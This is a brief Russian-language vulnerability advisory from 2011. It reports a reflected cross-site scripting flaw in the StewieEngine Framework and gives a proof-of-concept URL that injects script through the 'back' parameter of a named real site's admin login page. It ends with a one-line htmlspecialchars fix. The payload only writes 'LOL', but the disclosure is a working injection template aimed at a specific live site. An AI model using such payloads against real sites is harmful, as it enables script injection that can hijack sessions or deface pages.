1) Дата: 25.08.2011

2) Продукт: Официальный сайт . Версия - не известна. StewieEngine Framework

3) Уязвимость: XSS

4) Автор: Фараон

5) Тип: удалённая

6) Опасность: 3

7) Описание: XSS и этим все сказано. Код отсутствует так как cms платная.

8) Эксплоит: http://www.sibcontact.ru/admin/login.php?back=">document.write('LOL');

9) Решение: htmlspecialchars($_GET[back]);